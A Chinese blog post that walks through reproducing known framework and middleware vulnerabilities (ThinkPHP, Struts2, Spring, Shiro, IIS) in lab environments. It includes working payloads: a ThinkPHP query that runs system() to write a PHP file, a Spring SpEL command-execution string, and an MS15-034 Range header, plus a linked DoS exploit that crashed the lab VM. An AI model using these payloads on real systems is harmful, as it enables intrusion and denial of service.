常见的框架漏洞

已于 2024-08-07 21:05:13 修改
阅读量1.1k 收藏 12
点赞数 29
文章标签: web安全
于 2024-08-07 13:52:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cheapkiller/article/details/140989617
版权

ThinkPHP

首先我们打开一个环境

然后进行远程命令执行代码

然后进行远程代码执行

 ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

在网页中输出phpinfo

getshell

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20"<?php%20phpinfo();?>"%20>>1.php

然后我们访问创建的php文件

STRUTS2

S2-057远程执行代码漏洞

首先进入环境访问靶机地址

在url后输入${(123+123)}/actionChain1.action刷新后会出现数字

然后将出现的数字里的内容payload修改为编码后的内容

首先要进行抓包

然后再进行修改出现root就可以

Spring

Spring Data Rest 远程命令执行命令(CVE-2017-8046)

首先打开环境

然后访问customers/1

然后进行抓包使⽤PATCH请求来修改

数据包请求发送完成后,进入docker看是否执行命令

spring 代码执行(CVE-2018-1273)

首先打开环境

有这个叶子logo就证明正确

然后进入用户登陆界面

然后填写注册信息抓包

然后发送到重放器中修改username

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/lkj")]=&password=&repeatedPassword=

进入终端查看我们可以看到执行成功

docker exec -it b10ecde567a2 /bin/bash

shiro

Shiro rememberMe反序列化漏洞(Shiro-550)

首先进入环境

抓包确认是否搭建shiro框架

然后使用漏洞利用工具进行爆破漏洞

然后命令执行whoami

中间件

IIS

IIS6.x篇

使用windows server 2003打开IIS管理器

然后打开网站属性进行设置 一定要打开写入权限

然后使用bp对虚拟机IP进行抓包查看options支持的协议

然后用PUT上传文档

返回IIS网站文档查看发现新增文档

使⽤MOVE命令将其更名为脚本⽂档后缀

然后查看修改后的asp文件

如果你写入的asp文件是一句话木马就可以使用工具进行连接

IIS RCE-CVE-2017-7269

首先打开IIS管理器

然后使用kali进行监听

然后需要下载IISx6文件然后放到kali中

然后在文件夹中打开终端进行读取 文件后的第一个IP是2003的IP地址 第二个是kali的IP地址

稍等片刻之后就会监听成功

IIS 7x篇

HTTP.SYS远程代码执行(MS15-034) MS-->Microsoft 2015 -034

首先需要使用Windows server 2012

然后访问它的网站进行抓包

抓包之后修改请求头 添加Range: bytes=0-18446744073709551615

显示416证明存在远程执行代码漏洞

然后需要下载一个文件https://github.com/davidjura/MS15-034-lS-Active-DoS-Exploit-PoC

然后在根目录下使用python打开

上传的图片是虚拟机网站根目录下的图片

运行完成发现虚拟机已经蓝屏

无敌feed shit king
关注
  • 29
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
常见框架漏洞
Hacker0830的博客
04-13 2374
原理:当用户勾选RememberMe并登录成功,Shiro会将用户的cookie值序列化,AES加密,接着base64编码后存储在cookie的rememberMe字段中,服务端收到登录请求后,会对rememberMe的cookie值进行base64解码,接着进行AES解密,然后反序列化。S2-059:攻击者可以通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL表达式的Struts2标签的属性值,引发OGNL表达式解析,最终造成远程代码执行的影响。
常见漏洞类型汇总
Jasper的博客
11-18 3791
一、SQL注入漏洞 SQL注入攻击(SQL Injection),简称注入攻击、SQL注入,被广泛用于非法获取网站控制权,是发生在应用程序的数据库层上的安全漏洞。在设计程序,忽略了对输入字符串中夹带的SQL指令的检查,被数据库误认为是正常的SQL指令而运行,从而使数据库受到攻击,可能导致数据被窃取、更改、删除,以及进一步导致网站被嵌入恶意代码、被植入后门程序等危害。 SQL注入的位置 (1)表...
常见框架漏洞大全(附带修复方法)
C233333235的博客
08-07 670
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。
常见框架漏洞~~
最新发布
网安小白
08-07 820
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。
Spring框架漏洞(附修复方法)
C233333235的博客
08-07 842
Spring是Java EE编程领域的一个轻量级开源框架,该框架由一个叫Rod Johnson的程序员在2002年最早提出并随后创建,是为了解决企业级编程开发中的复杂性,业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用,实现敏捷开发的应用型框架框架的主要优势之一就是其分层架构,分层架构允许使用者选择使用哪一个组件,同时为J2EE应用程序开发提供集成的框架
java框架漏洞_Spring 框架漏洞集合
weixin_42514750的博客
02-25 5550
虽说是Spring框架漏洞,但以下包含并不仅Spring Framework,Spring Boot,还有Spring Cloud,Spring Data,Spring Security等。CVE-2010-1622 Spring Framework class.classLoader类远程代码执行影响版本:SpringSource Spring Framework 3.0.0 - 3.0.2、S...
web中间件常见漏洞总结.pdf
12-14
以下是对这些常见漏洞的详细总结: 1. **SQL注入**:当Web应用未能正确过滤或转义用户输入的数据时,攻击者可以插入恶意SQL语句,从而获取敏感信息、篡改数据甚至完全控制数据库。 2. **跨站脚本(XSS)**:XSS...
常见框架以及框架漏洞
10-17
在使用这些框架时,需要注意一些常见漏洞,比如SQL注入、XSS攻击、CSRF攻击等。 其中,SQL注入是指攻击者通过在输入框中输入恶意的SQL语句,从而获取或篡改数据库中的数据。XSS攻击是指攻击者通过在网页中注入...
Python常见安全漏洞及修复方法.pdf
06-29
修复此类漏洞的方法包括使用参数化查询而非字符串拼接构造SQL命令,使用ORM框架来避免直接操作SQL,以及对输入数据进行严格的验证和过滤。 二、XML解析相关漏洞 在解析XML文件时,如果文件来自不可信任的源,可能会...
常见漏洞利用框架整理
Fiverya的博客
09-12 425
很多漏洞利用框架
热门框架漏洞
wutiangui的博客
08-30 884
Struts2漏洞是一个经典的漏洞系列,根源在于Struts2引入了OGNL表达式使得框架具有灵活的动态性。随着整体框架的补丁完善,现在想挖掘新的Struts2漏洞会比以前困难很多,从实际了解的情况来看,大部分用户早就修复了历史的高危漏洞。目前在做渗透测试时,Struts2漏洞主要也是碰碰运气,或者是打到内网之后用来攻击没打补丁的系统会比较有效。log4j2是全球使用广泛的java日志框架,同时该漏洞还影响很多全球使用量的Top序列的通用开源组件。
网络安全深入学习第七课——热门框架漏洞(RCE— Fastjson反序列化漏洞
p36273的博客
09-18 1721
json全称是JavaScript object notation。即JavaScript对象标记法,使用键值对进行信息的存储。"age":23,json本质就是一种字符串,用于信息的存储和交换。------ Fastjson 是一个阿里巴巴公司开源的 Java 语言编写的高性能功能完善的 JSON 库。可以将Java 对象转换为 JSON 格式(序列化),当然它也可以将 JSON 字符串转换为 Java 对象(反序列化)。
PHP常用框架漏洞
小小猪的博客
08-14 3038
PHP常用框架漏洞 PHP框架 laraval介绍: Laravel基于MVC架构,可以满足诸如事件处理、用户身份验证等各种需求,同时通过包管理实现模块化和可扩展的代码,并且对数据库管理有着健壮的支持。 漏洞: 1. Laravel 配置文件泄露 2. Laravel <= 8.4.2 存在远程代码执行漏洞 3. Laravel 存在SQL注入漏洞 4. Laravel 反序列化漏洞 CakePHP 介绍: ...
JAVA常用框架漏洞
小小猪的博客
08-13 3771
三大语言常用框架漏洞 Java框架 1.MyBatis 是支持定制化 SQL、存储过程以及高级映射的优秀的持久层框架,其主要就完成2件事情: 封装JDBC操作 利用反射打通Java类与SQL语句之间的相互转换 MyBatis的主要设计目的就是让我们对执行SQL语句时对输入输出的数据管理更加方便,所以方便地写出SQL和方便地获取SQL的执行结果才是MyBatis的核心竞争力。 ...
常见web中间件&java框架漏洞&总结
bobo_milk的博客
05-21 1453
对近期的web中间件漏洞进行了解。因此我对常见web中间件漏洞进行了收集以及整理。(本篇文章将持续更新) 文章目录 一、IIS 二、Apache 三、Nginx 四、Tomcat 一、IIS IIS6.x 解析漏洞 原理:服务器默认不解析; 号及其后面的内容,相当于截断 *.asp;.jpg的文件会当成asp文件执行;/*.asp文件夹下的文件也会被当作asp脚本执行 另外,IIS6.x除了会将扩展名为....
框架/组件漏洞系列1:struts2漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-03 9574
前言: 本篇文章中复现的漏洞不是特别全面,但是挑选了最近两年的漏洞进行复现,旨在对漏洞进行有用复现,毕竟一些老漏洞已经基本不存在了。 一、Struts简介 1、简介 基本介绍: Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实现了基于[Java EE](https://.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值